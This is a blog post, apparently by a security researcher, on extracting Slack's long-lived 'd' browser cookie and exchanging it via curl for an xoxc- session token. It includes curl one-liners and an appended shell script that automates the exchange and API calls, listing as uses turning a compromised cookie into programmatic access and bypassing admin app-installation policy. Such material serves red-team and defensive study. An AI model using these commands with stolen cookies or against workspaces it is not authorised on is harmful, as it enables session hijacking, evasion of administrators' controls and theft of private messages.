Retrieving and Using Slack Cookies for Authentication

Slack, like many other services, uses cookies to store authentication and session information. What is interesting with Slack, however, is that one particular cookie can be exchanged for a user session token, giving you programmatic API access as the user who generated it.

This cookie is imaginatively named d, and is available from a browser with an authenticated Slack session.

Getting the d (cookie)

In a browser window, authenticated to Slack and with Slack open, go to developer tools and head to the storage section (in Chrome this is under Application -> Storage)

Under cookies expand app[.]slack[.]com, and you will see all the cookies that Slack stores in the browser for the session.

The one you want to copy is the d cookie, that should start with xoxd-...

Take note of the expiry date on this cookie: ten years out. It is very long lived, so a copy taken from a browser stays usable long after the session it came from is forgotten.

Turning this into a User Session Token

This cookie can be used in an HTTP request to any Slack workspace the user has access to in order to retrieve a user session token, which begins xoxc-.... That token can then be used in place of a user or bot token for the Slack API.

Make a cURL request to a workspace you know the user has access to. I know that the cookie I have belongs to a user in the Slack workspace westeros-inc, so I send a cURL request like this:

curl -L --cookie "d=xoxd-REDACTED" https://westeros-inc.slack.com

In the response, amongst other things, Slack returns the user session token inside the page's JSON boot data under the api_token key.

We can pipe this output to grep with a regex that matches the token format to pull out just the session token value:

curl -L --silent --cookie "d=xoxd-REDACTED" https://westeros-inc.slack.com | grep -ioE "(xox[a-zA-Z]-[a-zA-Z0-9-]+)"

Using this token

This token can be used in place of a user (xoxp-) or bot (xoxb-) token for API authentication to Slack. One caveat: an xoxc- token is only accepted when the request also carries the d cookie it was derived from, so send the token (as the bearer token or the token parameter) together with the d cookie in the Cookie header.
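The whole procedure above, from the cookie exchange through to an API call with the resulting token, as an added example that is not part of the original post. It uses the same request shape as the post's curl one-liner; the HTML snippet and token value it parses offline are constructed for the example, and the workspace name and cookie value on the command line are assumptions supplied by the caller. The API call sends the xoxc- token together with the d cookie, since Slack rejects the token on its own.

```shell
#!/bin/sh
# Added example (not from the original post): exchange a Slack d cookie for an
# xoxc session token and call the Web API with it.

# Constructed sample of the HTML Slack serves for an authenticated workspace
# request. The token value below is made up; real xoxc tokens are much longer.
SAMPLE_TOKEN='xoxc-111111111111-222222222222-333333333333-0123456789abcdef'
SAMPLE_PAGE='<script>boot_data = {"team_id":"T00000000","api_token":"'"$SAMPLE_TOKEN"'","user_id":"U00000000"};</script>'

# Read a workspace page on stdin and print the first api_token value.
# Anchoring on the JSON key means a stray xox... string elsewhere in the page
# is not mistaken for the session token. Returns 1 when no token is present.
extract_api_token() {
  tok=$(grep -oE '"api_token":"xox[a-z]-[A-Za-z0-9-]+"' \
        | head -n 1 \
        | sed -E 's/^"api_token":"//; s/"$//')
  [ -n "$tok" ] || return 1
  printf '%s\n' "$tok"
}

# fetch_session_token <workspace-subdomain> <d-cookie-value>
# Same request as the post's curl one-liner; -L follows the redirects Slack
# issues before it serves the client page that carries the token.
fetch_session_token() {
  curl -L --silent --cookie "d=$2" "https://$1.slack.com" | extract_api_token
}

# slack_api <method> <xoxc-token> <d-cookie-value>
# The xoxc token is only honoured when the d cookie it came from accompanies
# it, so both are sent: the token as a bearer header, the cookie as a cookie.
slack_api() {
  curl --silent --cookie "d=$3" -H "Authorization: Bearer $2" "https://slack.com/api/$1"
}

# Usage: ./slack_cookie.sh westeros-inc 'xoxd-...'
# Prints the auth.test response, which names the user the cookie belongs to.
if [ "$#" -eq 2 ]; then
  token=$(fetch_session_token "$1" "$2") || { echo "no api_token in page" >&2; exit 1; }
  slack_api auth.test "$token" "$2"
fi
```

auth.test is a good first call because it returns the user ID, team and URL the token is bound to without touching any workspace data; swap in conversations.list or search.messages once you have confirmed whose session you are holding.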

Use Cases

There are two main use cases for this user session token:

  • Getting programmatic access to Slack workspaces where app installation is restricted by Admin policy
  • Turning a compromised Slack cookie from a browser session into programmatic access to Slack

Or, in a shameless plug, a Slack cookie can be used with Slack Watchman to enumerate workspaces and find exposed secrets.
